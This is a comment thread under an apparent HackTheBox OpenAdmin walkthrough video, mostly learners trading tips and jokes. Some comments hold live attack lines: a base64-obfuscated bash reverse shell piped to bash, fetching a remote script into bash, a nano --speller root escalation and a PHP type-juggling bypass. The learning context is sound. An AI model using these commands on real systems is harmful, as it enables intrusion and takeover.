The reason why the hash thing wasn't working was because on the php script both hashes were strings when being compared, so == just performs a regular string comparison just like === If you had compared "0" == "00e123asd" insted of 0 == "00e123asd" it wouldn't have evaluated to true either Thank you for the video
The vulnerability you were trying to exploit with ‘==‘ and ‘===‘ was type juggling. If you would tried comparing integer with string then it would have bypassed like comparing 0 with “00e3eekfkhfk” as you showed on your php interactive shell. Effectively sending 0 {integer} instead of “Revealed” {string} would have bypassed the check with “==“. Thanks for the video! The way you tackle the bumps is simply awesome :)
Learned a lot from the video, thank you so much for your work. Solving box live without preparation is a lot more better, and helps me get better at recon.
movies: Show a hacker using 3 terminals at the same time to hack anything people: Thats not real, there too much information at the same time. IppSec: Uses 3 terminals at the same time people: Wait thats illegal
john not autocompleting the wordlist path on pressing tab always drives me mad. I figured that putting a space after the equal fixes this --wordlist= /usr/share/seclists/...
Very nice box ! The reason that allows apache to access joanna's home directory is a virtual host rule, which gives temporary rights to apache as joanna. I was actually curious about it too, and finally figured it out. Nicely done and thank you for this content, keep up the good work !
The type confusion or type juggling or what ever you want to call it seems to have been fixed in the sense that if you compare two strings that start with a digit, it will only compare them as numbers as long as their numeric representation and string representation are equal (so, '0e2' is treated as a number, but '0ea' is not). This is not the case when comparing a number to a string: in this case it will just read until it encounters an invalid character for a number, and cast the read part as a number and then compare to the other side. If you look closely at 1:00:00 "0" == "0e1idsa" does not work, but 0 == "0e1idsa" works. Just in case anyone was curios.
Great job dude, one of the best for writeups and all that stuff. It was my first machine from HTB, but with tons of hints and help... You are doing the best job for explaining things.
Hello everyone. Even though I don't understand much, I am finding these videos absolutely fascinating. I would really love to learn this. What learning path would you suggest? I have some coding experience (Python, VBA, SQL, nothing fancy). I was thinking of starting with networking and Linux. I also found this thing called CTF, which seems very fun. Looking forward to all your comments. Cheers!
Learning network and linux will help pretty much. There are quite good websites to practice beside HTB (tryhackme, vulnhub) Try hack is much more beginner friendly. HTB has some easier machines, but to do most of the "easier's" boxes you will need to buy VIP. I started to learn a lot when I tried to actually do the machines, I take notes on everything and always keep searching. Good luck!
Ipp the word great is not enough to describe you. You are the best out their to explain these stuff. Will you ever make a Udemy course about pentesting or something like that?
If you want to privesc nano, look for the man: You have the '--speller' option, which call a program to check for spelling mistakes. You can set bash to be the program to check, then execute "ctrl+t" in nano to execute the speller, and boom, you get a bash with root privilege :) The website root-me got a great challenge for privilege escalation, it's called "bash - restricted shells" in the "app-script" challenges.
The webserver serving the main.php is actually owned by joanna, so you could have avoided cracking the passphrase of the private certificate and have directly a joanna shell. The reason the process doesn't show up when you run ps could be that you don't have full access to information about processes you don't have access to (similar to what happens with netstat [which actually shows you such a message])
I wish I could understand like you...I know it isn't something that comes over-night...I am beginner for this CTF and boxes...Any suggestions on how to build all the concepts I need to root the boxes?
~c or ~C gives me command not found :/ I did local port forwarding in my Kali (via ssh) but I am curious why the method from ippsec's video does not work on htb machine?
People's are really spoiling the boxes too much. I mean leaving the exploits and all are fine. But i found the root's id_rsa private key on tmp folder in forwardslash.😂 No wonder someone did that on purpose cuz that box doesn't have anything like reading files to get root.
I don't think someone did that on purpose, that key needed to be mounted. which is not much of a spoiler I hope, @IppSec please remove my comment if you feel otherwise
I can't get the SSH local port forward to work. Squiggly + C doesn't cut the mustard for me. It hurts my brain. How did you authenticate the connection? I currently believe you are local port forwarding on the OpenAdmin box right? On the OpenAdmin box you are saying if anything comes in on 9002 > send it to > 52846. When then back on your client does local host work for you rather than 10.10.10.171:9002?
not gonna watch it , already solved this box, but its still live, i did think it was allowed to post guides for live boxes, well maybe i should watch i am sure i will learn something new your videos are great
Personally, I watch other videos/read writeups on boxes that I solved, because I love seeing what people did different and if their approach was any better. This box retired today, boxes retire 4 hours prior to the weekly release, so people can learn from the retired machine while waiting for the new machine to be launched.
@@ippsec cool i love your videos i have been using them as part of my prep for oscp which is on monday, any boxes you would suggest going through at the last minute?
@@bugeyemonster imo you shouldn't be just racing through boxes if your oscp is on monday. Chill out and go through your notes if you have solved tj null's oscp list and can solve hackthebox's active boxes by your own you are good to go. Just make sure you identify the bad characters well in buffer overflow :p or you would be wasting a lot of time. Oscp exam isn't really that hard if you are ready. Good luck !!
So I was doing the same thing to get a proper reverse shell from the single command shell, I tried to upload a python rev shell file, but I did it using wget and it didn't work, but after watching this video, trying it with curl works, any idea why?
At 17:19 base64 did work, but because of cURL did this by passing that on URL, URL encoding is needed. I did this ===> echo%20YmFzaCAtYyAnYmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNC4yLzkwMDEgMD4mMSc%3d|base64%20-d|bash
To be fair, OpenAdmin is on the 'harder' end of easy. This box didn't require huge amounts of technical skill. It more required familiarly with a number of things: linux; linux commands to sift through all the information a user can access; ports, and when a port is doing something 'suspicious'. I personally find that Linux machines on HTB are always that bit more difficult than they are otherwise rated to be. If you're looking for easy machines, I'd recommend attacking Windows machines that are rated easy, as they seem to be more accurate. Don't feel disheartened if you're just starting out and watch videos like this either. IppSec is so good at what he does that he does EASY boxes his own HARD way, so we can learn alternative methods.
@@user-sl7oz1fh1s This is exactly what I was looking for as I am a beginner and tried for like 2 days for this box and just got a shell...failed to locate the ssh key....here I was seeing all the comments saying "easy" and got discouraged but after you're message...I think I don't know it yet.(Will get better soon:)
Sorry for that potato English Guys I hope you can help me I m working on a box I got access as daemon but I don't have bash shell I wasn't able to get reverse shell at all But I was able to upload php webshell the version of the kernel is too outdated and I have the creds of user and this user have bash shell The problem is I don't know how to run my local exploit without getting reverse shell Also ssh is closed so I can't login as user BUT I FOUND something interesting MySQL have bash shell .. Please can you help me guys
Ha. Thankfully, it didn't delay me too much. Was disappointed I forgot about URL Encoding, figured curl would do a good enough job. That alone would have shortened the video by like 20 minutes. Oh well, still would have gotten the bloods if I could compete :).
Watching you not being able to type simple commands is brutal. It seems you're just blindly poking at boxes and hoping to get lucky. Most of the time you're just fucking things up or missing info because you're going too fast.
47:57 tbh... showing how an exploit is found/why it works is all cool. When you go into explaining how they "should" have stopped it you are going beyond scope and length for this video. Thumbs down.
What good is knowing how to exploit things, if you don't also know how to prevent it? A pentest report that just shows vulnerabilities and no detailed information on how to prevent it is pretty meaningless. If the video is too long for you because of this information, just use the timestamps in the description to jump to the next chapter.
Normal people: "How do I exit vim?"
Ippsec: "How do I exit nano?" xD
Anyways, great vid as always, thanks!
😂😂
He was trying to escape to a shell not exit 😒
@@kristibegaj608 congratulations you pointed out the joke
The reason why the hash thing wasn't working was because on the php script both hashes were strings when being compared, so == just performs a regular string comparison just like ===
If you had compared "0" == "00e123asd" insted of 0 == "00e123asd" it wouldn't have evaluated to true either
Thank you for the video
Alex Terrats Type Juggling right :)
First box I ever rooted. Nice to see something relatively more "easy" in HTB
The vulnerability you were trying to exploit with ‘==‘ and ‘===‘ was type juggling. If you would tried comparing integer with string then it would have bypassed like comparing 0 with “00e3eekfkhfk” as you showed on your php interactive shell. Effectively sending 0 {integer} instead of “Revealed” {string} would have bypassed the check with “==“. Thanks for the video! The way you tackle the bumps is simply awesome :)
Learned a lot from the video, thank you so much for your work.
Solving box live without preparation is a lot more better, and helps me get better at recon.
movies: Show a hacker using 3 terminals at the same time to hack anything
people: Thats not real, there too much information at the same time.
IppSec: Uses 3 terminals at the same time
people: Wait thats illegal
There are no matrixes running so he did it wrong :D
this guy has the best htb videos at youtube.
best explanations, i just love it.
thank u for ur time, dont stop! :D
Well rip more points. Lovely video. I leaned a lot from you in the past year. Thank you
Finally rooted this box myself, took me 5hours but it's done :)
Been looking forward to watch your approach on this one!
watching you forget something else with the reverse shell everytime you tried was hillarious lol
That thing was funny 🤣🤣🤣
john not autocompleting the wordlist path on pressing tab always drives me mad. I figured that putting a space after the equal fixes this
--wordlist= /usr/share/seclists/...
Very nice box ! The reason that allows apache to access joanna's home directory is a virtual host rule, which gives temporary rights to apache as joanna. I was actually curious about it too, and finally figured it out.
Nicely done and thank you for this content, keep up the good work !
Does it use suidcgi?
I thought it was because the file had gid 'internal' and the apache process run as gid 'internal' too.
The type confusion or type juggling or what ever you want to call it seems to have been fixed in the sense that if you compare two strings that start with a digit, it will only compare them as numbers as long as their numeric representation and string representation are equal (so, '0e2' is treated as a number, but '0ea' is not). This is not the case when comparing a number to a string: in this case it will just read until it encounters an invalid character for a number, and cast the read part as a number and then compare to the other side.
If you look closely at 1:00:00 "0" == "0e1idsa" does not work, but 0 == "0e1idsa" works.
Just in case anyone was curios.
Great job dude, one of the best for writeups and all that stuff. It was my first machine from HTB, but with tons of hints and help... You are doing the best job for explaining things.
hah! I was also confused when curling without authentication/credentials gave the key! Thank you for walking through that
at 48:20 I cant get the ~C to do anything is that the exact keys or am I missing something ? cant get the ssh command line to load.
Hello everyone. Even though I don't understand much, I am finding these videos absolutely fascinating. I would really love to learn this. What learning path would you suggest? I have some coding experience (Python, VBA, SQL, nothing fancy). I was thinking of starting with networking and Linux. I also found this thing called CTF, which seems very fun. Looking forward to all your comments. Cheers!
Learning network and linux will help pretty much. There are quite good websites to practice beside HTB (tryhackme, vulnhub)
Try hack is much more beginner friendly. HTB has some easier machines, but to do most of the "easier's" boxes you will need to buy VIP.
I started to learn a lot when I tried to actually do the machines, I take notes on everything and always keep searching.
Good luck!
23:38, you had forgot to start-up nc again thats all. Great video again dude, GG
Top tier hacker. The website is protected. He says this website is horrible. Website gives the password
The one whom i have not seen but i am glad to have him as my mentor 🙏.This man has deep impact on my life honestly.
Ipp the word great is not enough to describe you.
You are the best out their to explain these stuff.
Will you ever make a Udemy course about pentesting or something like that?
As I watching these videos I start to feel that I should start pentest.
If you want to privesc nano, look for the man:
You have the '--speller' option, which call a program to check for spelling mistakes. You can set bash to be the program to check, then execute "ctrl+t" in nano to execute the speller, and boom, you get a bash with root privilege :)
The website root-me got a great challenge for privilege escalation, it's called "bash - restricted shells" in the "app-script" challenges.
Good work! At 48:20 what command did to execute to get into SSH command mode?
~C
The webserver serving the main.php is actually owned by joanna, so you could have avoided cracking the passphrase of the private certificate and have directly a joanna shell. The reason the process doesn't show up when you run ps could be that you don't have full access to information about processes you don't have access to (similar to what happens with netstat [which actually shows you such a message])
love this ippsec! Thanks! This was my first box :D
@IppSec 24:00 first you didn't ran the python3, then you forgot to listen to nc, for the bash I think you should specified the /bin/bash
Thanks for 47:31. First time i did the box, i just curled it easy. Second time, not so much
I wish I could understand like you...I know it isn't something that comes over-night...I am beginner for this CTF and boxes...Any suggestions on how to build all the concepts I need to root the boxes?
HTB probably isn't the place to actually learn new concepts but more for reinforcing them. I like TryHackMe for actually learning new things.
~c or ~C gives me command not found :/
I did local port forwarding in my Kali (via ssh) but I am curious why the method from ippsec's video does not work on htb machine?
Awesome man, great box too🔥⚡
People's are really spoiling the boxes too much. I mean leaving the exploits and all are fine. But i found the root's id_rsa private key on tmp folder in forwardslash.😂 No wonder someone did that on purpose cuz that box doesn't have anything like reading files to get root.
What do you mean? You can escape out of nano and get rood :)
This is the best thing in hack the box 😂😂😂
@@ippsec he is saying about the forwardslash box i guess 🙄
I don't think someone did that on purpose, that key needed to be mounted. which is not much of a spoiler I hope, @IppSec please remove my comment if you feel otherwise
You're awesome 🔥
I was going to watch The Matrix, but now that I found this, I'm watching this instead! Now let me get my popcorn and rootbeer! 💗 🍿
How do u get ssh command mode? ( 48:27 )
I can't get the SSH local port forward to work. Squiggly + C doesn't cut the mustard for me. It hurts my brain. How did you authenticate the connection? I currently believe you are local port forwarding on the OpenAdmin box right? On the OpenAdmin box you are saying if anything comes in on 9002 > send it to > 52846. When then back on your client does local host work for you rather than 10.10.10.171:9002?
Thank you. You doing awesome work.
not gonna watch it , already solved this box, but its still live, i did think it was allowed to post guides for live boxes, well maybe i should watch i am sure i will learn something new your videos are great
Personally, I watch other videos/read writeups on boxes that I solved, because I love seeing what people did different and if their approach was any better. This box retired today, boxes retire 4 hours prior to the weekly release, so people can learn from the retired machine while waiting for the new machine to be launched.
@@ippsec cool i love your videos i have been using them as part of my prep for oscp which is on monday, any boxes you would suggest going through at the last minute?
@@bugeyemonster imo you shouldn't be just racing through boxes if your oscp is on monday. Chill out and go through your notes if you have solved tj null's oscp list and can solve hackthebox's active boxes by your own you are good to go. Just make sure you identify the bad characters well in buffer overflow :p or you would be wasting a lot of time. Oscp exam isn't really that hard if you are ready. Good luck !!
@@bugeyemonster hackthebox's easy-medium boxes*
@@thev01d12 sound advice :)
So I was doing the same thing to get a proper reverse shell from the single command shell, I tried to upload a python rev shell file, but I did it using wget and it didn't work, but after watching this video, trying it with curl works, any idea why?
At 17:19 base64 did work, but because of cURL did this by passing that on URL, URL encoding is needed. I did this ===> echo%20YmFzaCAtYyAnYmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNC4yLzkwMDEgMD4mMSc%3d|base64%20-d|bash
How we are searching inside the linPEAS?
hello,
hoca can ı search output terminal? have it si short key?
Anyone recommend what to do if when you run linpeas on the server nothing happens?
piped it to bash?
x.x.x.x/linpeas.sh | bash
Perl reverse shell works as well.
you are the best keep it up!!!!!!
your videos are great!
Good work but not like usual, got headache :))
i spent like 20 hours trying to root this and still failed, can anybody tell me if it gets easier, and if so how long does it take?
URL encoding worked for me as reverse shell option with bash command
Many people rooted the box only from www-data shell and skipping the user. Anyone knows how?
Thank you for the video.
Is this actually easy😥??
To be fair, OpenAdmin is on the 'harder' end of easy. This box didn't require huge amounts of technical skill. It more required familiarly with a number of things: linux; linux commands to sift through all the information a user can access; ports, and when a port is doing something 'suspicious'.
I personally find that Linux machines on HTB are always that bit more difficult than they are otherwise rated to be. If you're looking for easy machines, I'd recommend attacking Windows machines that are rated easy, as they seem to be more accurate.
Don't feel disheartened if you're just starting out and watch videos like this either. IppSec is so good at what he does that he does EASY boxes his own HARD way, so we can learn alternative methods.
@@user-sl7oz1fh1s This is exactly what I was looking for as I am a beginner and tried for like 2 days for this box and just got a shell...failed to locate the ssh key....here I was seeing all the comments saying "easy" and got discouraged but after you're message...I think I don't know it yet.(Will get better soon:)
@@user-sl7oz1fh1s Thanks for the advice man
why not just use the metasploit payload ??
if you do the OSCP, you are not allowed to use msf - also its much smarter to understand the concept, than using finished scripts :)
Omg are those points gone as well? How do you guys ever get to thousands of points?
There will be no Saturday Livestream? 🙁
Nope. No real motivation to do livestreams anymore, using the time to work on some personal projects that I don't want to be public.
@@ippsec kind of sad for me . But, wishing luck for your project 🤗
Great stuff!
This was my first root own :)
How come john and hashcat couldn't crack that sha512 but a website had it. Smh
I believe it’s how the hash is being shown. Ie sha512sum looked to be about half the length, so I’m guessing it’s being shown in hex form.
totally dont understand why this was classified as an EASY box!
Sorry for that potato English
Guys I hope you can help me
I m working on a box I got access as daemon but I don't have bash shell I wasn't able to get reverse shell at all
But I was able to upload php webshell the version of the kernel is too outdated and I have the creds of user and this user have bash shell
The problem is I don't know how to run my local exploit without getting reverse shell
Also ssh is closed so I can't login as user
BUT I FOUND something interesting MySQL have bash shell ..
Please can you help me guys
57:26 🤣🤣
I hacked the box in one shot, in about 40 mins or less and I am a dummie lol, congrat me:(
awesome
Haha at 23:30 you didn't listen with netcat.
Ha. Thankfully, it didn't delay me too much. Was disappointed I forgot about URL Encoding, figured curl would do a good enough job. That alone would have shortened the video by like 20 minutes. Oh well, still would have gotten the bloods if I could compete :).
@@ippsec 😂😂😂😂
Lol I spent 3hrs down a rabbit hole exploit
It was eZ peZ tbh
Do sauna
First Comment first like 😁
Watching you not being able to type simple commands is brutal. It seems you're just blindly poking at boxes and hoping to get lucky. Most of the time you're just fucking things up or missing info because you're going too fast.
47:57 tbh... showing how an exploit is found/why it works is all cool. When you go into explaining how they "should" have stopped it you are going beyond scope and length for this video. Thumbs down.
What good is knowing how to exploit things, if you don't also know how to prevent it? A pentest report that just shows vulnerabilities and no detailed information on how to prevent it is pretty meaningless. If the video is too long for you because of this information, just use the timestamps in the description to jump to the next chapter.
@@ippsec I guess I'm just a complainer. I didn't really give it a thumbs down either way. xD